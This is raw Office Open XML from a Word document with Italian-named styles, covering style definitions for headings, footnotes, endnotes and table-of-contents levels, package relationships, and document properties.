  <w:latentStyles w:count="376" w:defLockedState="0" w:defQFormat="0" w:defSemiHidden="0" w:defUIPriority="99" w:defUnhideWhenUsed="0">
    <w:lsdException w:name="Normal" w:qFormat="1" w:uiPriority="0"/>
    <w:lsdException w:name="heading 1" w:qFormat="1" w:uiPriority="9"/>
    <w:lsdException w:name="heading 2" w:qFormat="1" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="heading 3" w:qFormat="1" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="heading 4" w:qFormat="1" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="heading 5" w:qFormat="1" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="heading 6" w:qFormat="1" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="heading 7" w:qFormat="1" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="heading 8" w:qFormat="1" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="heading 9" w:qFormat="1" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed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qFormat="1" w:semiHidden="1" w:uiPriority="35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 w:uiPriority="10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 w:uiPriority="1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 w:uiPriority="22"/>
    <w:lsdException w:name="Emphasis" w:qFormat="1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qFormat="1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qFormat="1" w:uiPriority="34"/>
    <w:lsdException w:name="Quote" w:qFormat="1" w:uiPriority="29"/>
    <w:lsdException w:name="Intense Quote" w:qFormat="1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qFormat="1" w:uiPriority="19"/>
    <w:lsdException w:name="Intense Emphasis" w:qFormat="1" w:uiPriority="21"/>
    <w:lsdException w:name="Subtle Reference" w:qFormat="1" w:uiPriority="31"/>
    <w:lsdException w:name="Intense Reference" w:qFormat="1" w:uiPriority="32"/>
    <w:lsdException w:name="Book Title" w:qFormat="1" w:uiPriority="33"/>
    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="TOC Heading" w:qFormat="1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed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default="1" w:styleId="Normale" w:type="paragraph">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="1A1A1A"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Titolo1" w:type="paragraph">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="220" w:before="500"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Titolo2" w:type="paragraph">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120" w:before="320"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1B3A6B"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Titolo3" w:type="paragraph">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="80" w:before="240"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1B3A6B"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Titolo4" w:type="paragraph">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="60" w:before="180"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="64748B"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Titolo5" w:type="paragraph">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="2E74B5"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Titolo6" w:type="paragraph">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="1F4D78"/>
    </w:rPr>
  </w:style>
  <w:style w:default="1" w:styleId="Carpredefinitoparagrafo" w:type="character">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:default="1" w:styleId="Tabellanormale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Nessunelenco" w:type="numbering">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:styleId="Titolo" w:type="paragraph">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="Enfasigrassetto1" w:type="paragraph">
    <w:name w:val="Enfasi (grassetto)1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Paragrafoelenco" w:type="paragraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:qFormat/>
  </w:style>
  <w:style w:styleId="Collegamentoipertestuale" w:type="character">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Rimandonotaapidipagina" w:type="character">
    <w:name w:val="footnote reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Testonotaapidipagina" w:type="paragraph">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normale"/>
    <w:link w:val="TestonotaapidipaginaCarattere"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="TestonotaapidipaginaCarattere" w:type="character">
    <w:name w:val="Testo nota a piè di pagina Carattere"/>
    <w:link w:val="Testonotaapidipagina"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Rimandonotadichiusura" w:type="character">
    <w:name w:val="endnote reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Testonotadichiusura" w:type="paragraph">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="Normale"/>
    <w:link w:val="TestonotadichiusuraCarattere"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="TestonotadichiusuraCarattere" w:type="character">
    <w:name w:val="Testo nota di chiusura Carattere"/>
    <w:link w:val="Testonotadichiusura"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Sommario1" w:type="paragraph">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0008722E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:styleId="Sommario2" w:type="paragraph">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0008722E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="230"/>
    </w:pPr>
  </w:style>
  <w:style w:styleId="Sommario3" w:type="paragraph">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0008722E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="460"/>
    </w:pPr>
  </w:style>
  <w:style w:styleId="Sommario4" w:type="paragraph">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0008722E"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:color w:val="auto"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Sommario5" w:type="paragraph">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0008722E"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:color w:val="auto"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Sommario6" w:type="paragraph">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0008722E"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:color w:val="auto"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Sommario7" w:type="paragraph">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0008722E"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:color w:val="auto"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Sommario8" w:type="paragraph">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0008722E"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:color w:val="auto"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Sommario9" w:type="paragraph">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0008722E"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:color w:val="auto"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Menzionenonrisolta" w:type="character">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0008722E"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:color="auto" w:fill="E1DFDD" w:val="clear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7" Target="numbering.xml" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Id="rId16" Target="styles.xml" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Id="rId15" Target="settings.xml" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Id="rId14" Target="webSettings.xml" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Id="rId13" Target="fontTable.xml" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Id="rId12" Target="theme/theme1.xml" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Id="rId11" Target="footnotes.xml" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Id="rId10" Target="comments.xml" /><Relationship Id="rId8" Target="header1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" /><Relationship Id="rId9" Target="footer1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer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22492</Words>
  <Characters>128209</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1068</Lines>
  <Paragraphs>300</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>150401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2026-05-13T09:06:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-13T09:06:28Z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